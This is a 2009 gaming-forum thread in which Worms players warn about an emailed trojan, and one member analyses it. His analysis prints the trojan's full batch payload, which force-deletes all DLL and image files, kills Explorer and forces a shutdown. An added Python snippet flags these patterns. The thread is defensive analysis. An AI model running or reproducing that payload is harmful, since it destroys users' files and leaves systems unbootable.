Warning: Do not open emails with "Constipated Silkworm" attachments


Malevol3nt
27 Mar 2009, 19:27
I'm not sure if this is an isolated incident or if someone is targeting e-mails from some worms related website.

I got this in my e-mail today:

http://i43.tinypic.com/54dpch.jpg

I figure this is someone posing to be Pisto, probably trying to hurt his reputation or something. In any case, if you get this kind of e-mail do not open the attachment or run the application in the archive. It will mess up your Windows settings and force your OS to shut down (you will get a 1 minute countdown with a message "hacked by 0"). Easily fixed via safe mode or just using a backup.

But in any case I just thought I'd warn ya.

CyberShadow
27 Mar 2009, 20:25
Please forward me the e-mail and, if you can, the full headers. (In Gmail, this is called "Show original" in the drop-down menu, it may be different with whatever webmail you're using.)
My address is thecybershadow@gmail.com .

By the way, a timed shutdown can be cancelled by running the command: shutdown -a

CyberShadow
28 Mar 2009, 00:34
I checked the e-mail and the attachment. Here are my results:

The attachment is a RAR archive containing three files: ConstipatedSilkworm.exe, Hooktap.dll and readme.txt.

readme.txt contains a copy of the e-mail text (starting from the 2nd line onwards). Hooktap.dll is just W:A's DXMfc.dll, copied from a W:A installation and renamed to Hooktap.dll. It's not used at all by the .exe file.

ConstipatedSilkworm.exe is a UPX (http://en.wikipedia.org/wiki/UPX)-packed executable written in PureBasic (http://en.wikipedia.org/wiki/PureBasic). It has a WormKit icon. It's possible that it's one of those "batch file compilers", which do nothing but wrap an executable around a batch file, which would drop and run the said batch file.

From my limited analysis, the program seems to drop (to a temporary folder) and execute the following batch file (which is loaded from the program's resources):

@ECHO OFF
CD C:\
DEL /F /S /A *.dll
DEL /F /S /A *.png *.bmp *.jpg
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
C:\WINDOWS\system32\shutdown.exe -S -F -T 60 -C " Hacked by 0"

The batch file is executed in a hidden window (no command prompt window is displayed). This code attempts to delete all DLL (http://en.wikipedia.org/wiki/Dynamic-link_library) files (program and operating system components), as well as picture files with the .png, .bmp and .jpg file extensions from the entire C: drive (if it's the current drive, otherwise it will only delete files from under the current folder). Afterwards, it terminates the Windows Explorer process (repeatedly, probably in an attempt to defeat its auto-restart feature) and initiates a delayed shutdown (with a 60-second timeout). The trojan may have more behavior code; I haven't analyzed the entire program's code.

I have also determined the sender's WormNET identity, but it's up to Malevol3nt if he wants it disclosed to the public.
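
Added example, not part of CyberShadow's post or of anyone's code in this thread: a small static triage pass in Python that flags the three behaviours described above (recursive wildcard DEL, repeated process kills, forced shutdown) and records that the CD has no /D, which is why the delete scope depends on the current drive. The triage() function and its rule names are made up for this illustration; the sample input is the batch file quoted in the post, with the tskill run shortened.

```python
import re

# Batch script quoted in the post above; its 30 "tskill explorer" lines are
# shortened to 3 here.
SAMPLE = r'''@ECHO OFF
CD C:\
DEL /F /S /A *.dll
DEL /F /S /A *.png *.bmp *.jpg
tskill explorer
tskill explorer
tskill explorer
C:\WINDOWS\system32\shutdown.exe -S -F -T 60 -C " Hacked by 0"
'''

def tokens(line):
    """Split a batch line into tokens, keeping quoted strings whole."""
    return re.findall(r'"[^"]*"|\S+', line)

def command(tok):
    """'C:\\WINDOWS\\system32\\shutdown.exe' -> 'shutdown', '@ECHO' -> 'echo'."""
    name = tok.strip('"').lstrip("@").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def triage(script):
    """Return a list of findings for destructive commands in a batch script."""
    findings, cd_target, drive_switched = [], None, False
    for no, line in enumerate(script.splitlines(), 1):
        toks = tokens(line)
        if not toks:
            continue
        cmd, args = command(toks[0]), toks[1:]
        low = [a.lower() for a in args]
        if cmd in ("cd", "chdir"):
            # Without /D, CD does not change the current drive.
            drive_switched = "/d" in low
            cd_target = next((a for a in args if not a.startswith("/")), None)
        elif cmd in ("del", "erase"):
            targets = [a for a in args if not a.startswith("/")]
            if "/s" in low and any("*" in t or "?" in t for t in targets):
                findings.append({"line": no, "rule": "recursive-wildcard-delete",
                                 "targets": targets, "force": "/f" in low,
                                 "cd_target": cd_target,
                                 "drive_switched": drive_switched})
        elif cmd in ("tskill", "taskkill"):
            prev = findings[-1] if findings else None
            if prev and prev["rule"] == "process-kill" and prev["args"] == low:
                prev["count"] += 1  # collapse a run of identical kills
            else:
                findings.append({"line": no, "rule": "process-kill",
                                 "args": low, "count": 1})
        elif cmd == "shutdown":
            flags = [a.lstrip("-/") for a in low]
            if "s" in flags or "r" in flags:
                i = flags.index("t") + 1 if "t" in flags else len(flags)
                timeout = (int(flags[i])
                           if i < len(flags) and flags[i].isdigit() else None)
                findings.append({"line": no, "rule": "forced-shutdown",
                                 "force": "f" in flags, "timeout": timeout})
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```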

MihaiS
28 Mar 2009, 01:27
Doubletime found a tutorial on the Internets... big deal!

Plasma
28 Mar 2009, 14:48
I don't know which is more insulting: that there's someone in the Worms community trying to spread malware to us for no reason, or that their malware is so... crude! I mean, if you're going to try and completely ruin someone's computer, you might as well do something better than 'delete all .dlls'. The only thing that says "I'm not an 8-year-old messing around, I'm actually trying to make you go insane here!" is the 60-second countdown and message!

franpa
28 Mar 2009, 14:59
what do the /F /S /A attributes mean?

robowurmz
28 Mar 2009, 16:14
/P  Prompts for confirmation before deleting each file.
/F  Force deleting of read-only files.
/S  Delete specified files from all subdirectories.
/Q  Quiet mode, do not ask if ok to delete on global wildcard
/A  Selects files to delete based on attributes

attributes  R  Read-only files    S  System files
            H  Hidden files       A  Files ready for archiving
            -  Prefix meaning not

So he couldn't even use the /A switch properly either.

I mean, /Q would have been much worse.

CyberShadow
28 Mar 2009, 16:43
/Q would have made a difference if he'd used "*.*".

Malevol3nt
28 Mar 2009, 18:21
The thing hasn't managed to erase a single file. I ran it on accident as I was trying to extract the files.

But as I said in the wcc forums, it boggles my mind that someone was actually plotting this hack the whole time, coding something directly aimed at me even tho I've never done any harm to this person.

Some kids just never grow up or learn when they've crossed the line.

pisto
28 Mar 2009, 22:43
pfffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffffffffffffffffffffffffffffffffffff ffffffffffffffffff

Plasma
28 Mar 2009, 22:45
I ran it on accident as I was trying to extract the files.
Smart.

But as I said in the wcc forums, it boggles my mind that someone was actually plotting this hack the whole time, coding something directly aimed at me even tho I've never done any harm to this person.
"Plotting" may be too strong a word here. I mean, it couldn't have taken more than half a minute to plan and make.
Also, are you sure it's against you, and not against Pisto's reputation?

Some kids just never grow up or learn when they've crossed the line.
Heck yes, I totally hate those people too! They're always jerks!
...
Why do I get a foreboding sense of distinct irony?

franpa
29 Mar 2009, 00:45
It won't delete anything system critical because of Windows File Protection or whatever it is called (it was implemented back in Windows ME first iirc).

Koen-ftw
29 Mar 2009, 00:47
It won't delete anything system critical because of Windows File Protection or whatever it is called (it was implemented back in Windows ME first iirc).

But it can still delete your personal pictures which is a horrible thing to do to someone...

plow
29 Mar 2009, 06:05
Who would do such a thing?! I mean it's not even funny! He didn't cross the line, he cut the line if you know what I mean. That is pretty messed up. Is there any way we can ban him? And why can't you tell us his wormnet name? I never want to play with him so can you tell me? I won't tell anyone. Please....

lDarKl
29 Mar 2009, 06:23
Also, how can there be someone as dumb and simple-minded as MrE? Yet again?

I send yuo hax u open it kkkkkk?

CyberShadow
29 Mar 2009, 18:36
It won't delete anything system critical because of Windows File Protection or whatever it is called (it was implemented back in Windows ME first iirc).
When I ran it on a virtual machine, WFP failed to restore files from its cache and asked for a Windows XP SP3 CD (I don't have an SP3 CD). Even if you have a CD, I doubt that WFP would cover all system DLL files. After the reboot, the system couldn't boot up.

Gnork
29 Mar 2009, 19:29
Fail.


So much for WFP.

CyberShadow
29 Mar 2009, 20:02
WFP wasn't really designed to handle a global deletion of DLL files.

Gnork
29 Mar 2009, 21:03
WFP wasn't really designed to handle a global deletion of DLL files.

does this mean you're defending M$, or are you just pointing out where its weakness is :rolleyes: hihihi j/k

CyberShadow
29 Mar 2009, 21:16
If you want to prevent random programs from crippling your system, launch them as a limited user. The default Windows XP user has administrator privileges, for compatibility reasons (there is just so much software that requires having administrative rights for no good reason). When Windows Vista introduced UAC and virtualization, software developers were forced to pay more attention to the principle of least privilege (http://en.wikipedia.org/wiki/Principle_of_least_privilege). Of course, none of this helps targeted attacks (like this one) from messing with your personal files. The only way to defend against this type of attack is to run all suspicious files in a virtual machine, or thoroughly analyze them before running them (which isn't possible for most end-users). No anti-virus or firewall software can defend against a targeted attack.

Muzer
29 Mar 2009, 21:19
Which is why you should run Linux (and keep regular backups of ~ somewhere in /)

darkfoot
29 Mar 2009, 22:13
well as a member of xDMx i know who this fool is and he will not play in any xDMx host in wormnet.

what a tool if it aint racist sum nicking your name and causing trouble for you "f4st" it's some tool sending you hack's and trying to crash ya pc.

is it not time for team17 to ban them from wormnet?

GreeN
29 Mar 2009, 22:42
darkfoot has chosen not to receive private messages or may not be allowed to receive private messages. Therefore you may not send your message to him/her.

I don't know who else Mal has told, but please continue to keep the name quiet for the moment. I'm still a little skeptical.

Plasma
30 Mar 2009, 00:01
if it aint racist sum
This line makes no sense! Seriously, it hurts my brain just to try and decipher it!

GreeN
30 Mar 2009, 00:57
*Scum?

Hope your brain feels better

franpa
30 Mar 2009, 12:03
When I ran it on a virtual machine, WFP failed to restore files from its cache and asked for a Windows XP SP3 CD (I don't have an SP3 CD). Even if you have a CD, I doubt that WFP would cover all system DLL files. After the reboot, the system couldn't boot up.

Oh, maybe it is improved in Vista/Windows 7? I knew the Windows ME implementation was buggy (or at least the software for Windows 9x at the time hated it). But I thought it was improved in XP; I guess software just got better rather than MS improving WFP.

darkfoot
30 Mar 2009, 13:56
This line makes no sense! Seriously, it hurts my brain just to try and decipher it!

if all you have to do is point out spelling mistakes what a great life you "dont" have :o

plasma get over ya ego and go get some sun :)

franpa
30 Mar 2009, 13:58
the number of letters is what likely confused him, if the number of letters and the starting and last letters all matched the word Scum then he likely would have worked it out.

Plasma
30 Mar 2009, 14:22
*Scum?
Hope your brain feels better
Sense made.

if all you have to do is point out spelling mistakes what a great life you "dont" have :o
I wasn't pointing out a spelling mistake, I was honestly confused as to what you were trying to say!

PolYp
30 Mar 2009, 15:40
I don't know who else Mal has told, but please continue to keep the name quiet for the moment. I'm still a little skeptical.
please tell me when the moment has come to reveal the secret! im dying to tell google the name and soon the world will know. but yes, im not fully convinced yet either... lets wait for the last pieces of evidence being put together and for the judge to pronounce the person in question guilty.

"Stop...The law has been broken. He who breaks the law shall be punished. Back to the House of Pain"

yakuza
30 Mar 2009, 15:58
So can you say who it was already?

GreeN
30 Mar 2009, 18:50
please tell me when the moment has come to reveal the secret! im dying to tell google the name and soon the world will know. but yes, im not fully convinced yet either... lets wait for the last pieces of evidence being put together and for the judge to pronounce the person in question guilty.

"Stop...The law has been broken. He who breaks the law shall be punished. Back to the House of Pain"

The only reasons anyone who is not directly involved in the situation would want to know are of a conceited and judgmental nature. Unless the person in suspect had intentions to continue this type of behavior, which I can assure you they do not, then matters would be different. I ask politely for confidence in the matter as a chance for total social exclusion from a befriended community to be avoided in the respect that this person is truly sorry for their actions and would benefit greatly from an understanding surrounding.

lDarKl
30 Mar 2009, 20:25
[insert smartass comment]

Scrub555
30 Mar 2009, 21:31
The only reasons anyone who is not directly involved in the situation would want to know are of a conceited and judgmental nature. Unless the person in suspect had intentions to continue this type of behavior, which I can assure you they do not, then matters would be different. I ask politely for confidence in the matter as a chance for total social exclusion from a befriended community to be avoided in the respect that this person is truly sorry for their actions and would benefit greatly from an understanding surrounding.

Truly sorry? Surely you could give his explanation?

GreeN
30 Mar 2009, 22:49
There is no justification to be given, it was plainly an inconsiderate and immature act

Malevol3nt
31 Mar 2009, 00:10
There is no justification to be given, it was plainly an inconsiderate and immature act

So you talked to him yet? I'd really like to know what possible reason he would have as a justification for what he's done. For the record, after our little dispute a bunch of months ago, we settled to friendly terms. We even played a few games and everything seemed friendly.

But I haven't seen or played with him for at least 3-4 months maybe more, so I really don't understand why he would target me for any reason at all, other than him having some blatant "showing-off" attitude.

Plasma
31 Mar 2009, 00:15
this person is truly sorry for their actions and would benefit greatly from an understanding surrounding.
I'm... sorry, how did that person go from trying to completely ruin both a computer and its images using identity fraud to someone that's completely sorry for the act and will never even have a second thought about it? What, did the gods themselves come down to him and show him the path to righteousness?

[insert smartass comment]
HEY! MY MOTHER WAS A SAINT!

Gnork
31 Mar 2009, 05:58
Some people suffer brainlags sometimes - perhaps this one was severe....

robowurmz
31 Mar 2009, 07:32
Oh hey there, Dishonesty, I wonder if this guy is Lying? Oh no, he couldn't possibly be, he only absentmindedly tried to delete a heap of system files and frame pisto by mistake.

Yeah. Sorry my ass. What he just did is strictly illegal under the Computer Misuse Act - any victim of this could press charges if they wanted to. This isn't a bit of fun, it's crime. Oh yeah, it's just a little thing that didn't even work, but the intent was there. Obviously he was conscious of his actions - therefore he is liable under law.

yakuza
31 Mar 2009, 08:11
All we know is that this guy is in Green's clan, is of Green's nationality or is Green's boyfriend.

Shirdel
31 Mar 2009, 09:07
Do you think someone should tell Pisto about this? I mean, after all, he is the one who's been framed.

MihaiS
31 Mar 2009, 09:16
Do you think someone should tell Pisto about this? I mean, after all, he is the one who's been framed.

Read this: http://forum.team17.co.uk/showpost.php?p=690313&postcount=10

What he just did is strictly illegal under the Computer Misuse Act - any victim of this could press charges if they wanted to. This isn't a bit of fun, it's crime. Oh yeah, it's just a little thing that didn't even work, but the intent was there. Obviously he was conscious of his actions - therefore he is liable under law.

Anyone can press charges against anyone, but the chances of winning depend on the circumstances, and these are not the best conditions.

You have better chances of f****ng a lion in the butt without getting hurt instead of being found guilty of harming somebody in a virtual medium, lol.

The only way of busting somebody is by sputtering him and getting him while doing it- then you can have a solid case.

Gnork
31 Mar 2009, 12:04
All we know is that this guy is in Green's clan, is of Green's nationality or is Green's boyfriend.

no, no, and no.

or was it

no, no, and definitely yes

or

no, no and he would wish that was true

anyway, its

no, no for sure, and then... well yea, i'm not into greens private life xD

yakuza
31 Mar 2009, 12:06
no, no, and no.

or was it

no, no, and definitely yes

or

no, no and he would wish that was true

anyway, its

no, no for sure, and then... well yea, i'm not into greens private life xD

Now we know he is also Gnork's friend.

MihaiS
31 Mar 2009, 12:45
Boy friend, not boyfriend. The space between boy and friend denotes that there's a distance between them, which may not apply in Green's case.

Gnork
31 Mar 2009, 13:13
Now we know he is also Gnork's friend.

ROFL

wrong again dude.

another No! for you. But yea, I've played with him a couple of times long long ago. This all surprises me, cz he doesn't match the profile of somebody I would expect this kinda nonsense from. Then again, your well known neighbour can be a serial killah -.-


Boy friend, not boyfriend. The space between boy and friend denotes that there's a distance between them, which may not apply in Green's case.

which space? i've only read boyfriend. without space. lol

MihaiS
31 Mar 2009, 13:18
I was cautious in regard to Yakuza's statement about you.

Chip
31 Mar 2009, 17:27
Speaking of things like this, I've just noticed that amongst my PM's is one from some guy named "aerosoul" sending me a PM to some random website - however the link appears to go to a .pdf file.

The PM dates back to the 14th August so it's old and this situation could have already been dealt with but basically does anyone remember anything like this ever been said on here?

franpa
31 Mar 2009, 18:10
yea just delete the PM, it was back when some virus was going around the internet.

Gnork
31 Mar 2009, 20:13
it was back when some virus was going around the internet.


talking about a virus... what's gonna happen tomorrow when Conficker gets active? :p seems like nobody knows?

Chip
31 Mar 2009, 21:10
What's Conficker?
Is that another of them Scientists' doomsday maker machines that creates black holes under europe and have time traveling Dinosaurs that come from the future to warn us of this impending doom that once destroyed the Dinosaurs of the past who created their own version of this machine?


Or is this something totally different?

Roboslob
31 Mar 2009, 21:23
It's something totally different. Or is it? No one is sure what it will do; currently it is spreading itself around, and on April 1st it is supposed to activate, allowing the creator to control the infected computers. You may be able to see if you're infected by trying to go to any website that offers virus protection, and if you are unable to reach those sites, there is a good chance you've got the virus. I'm not sure what you can do to get rid of it.

Muzer
31 Mar 2009, 22:09
Good job I'm on Linux then :D

I've read that it tries to access a file on one of thousands of domain names, so it could be it updates itself or something.

MihaiS
1 Apr 2009, 00:35
Here's a 55+ pages thread about not being able to: access anti-virus websites, update anti-virus software (or some other anti-something stuff), run any Sysinternals applications...

http://www.techtalkz.com/computer-security/515329-cannot-access-antivirus-sites-google-avast-etc.html

After asking for some help and doing some research, I found what seems to be the common solution for the problem:

http://www.techtalkz.com/computer-security/515329-cannot-access-antivirus-sites-google-avast-etc-54.html#post2053764

robowurmz
1 Apr 2009, 07:39
He'll probably deactivate the virus and be all "APRIL FOOLS"....

Thanks for the tips there MihaiS.
If anybody here gets it, we'll know what to do!

Shirdel
1 Apr 2009, 08:16
Well, it's April Fools. So, what now? I think that all shall be revealed. (Possibly.)

Gnork
1 Apr 2009, 10:57
Did the internet collapse yet? hmmm... guess not.. I can still post :/

Konar6
7 Apr 2009, 12:31
So, the case is closed by the guy's anonymous apology? I can fully understand that people make mistakes and we should be forgiving, however in my opinion, if this guy actually is from the community, I think the people in the community should be let to know who he is.
Yes, I vote for Malevol3nt disclosing his nick - what was the point for making this thread if he doesn't want to tell the name when it's known(?) then?
Again, I understand people make mistakes.

robowurmz
7 Apr 2009, 13:29
The Conficker worm... is doing some strange things.
http://i.gizmodo.com/5197148/how-the-conficker-problem-just-got-much-worse

Malevol3nt
7 Apr 2009, 16:51
what was the point for making this thread if he doesn't want to tell the name when it's known(?) then?
Again, I understand people make mistakes.

I opened this thread because I thought this e-mail was sent to other accounts from the Team17 forum and not just me.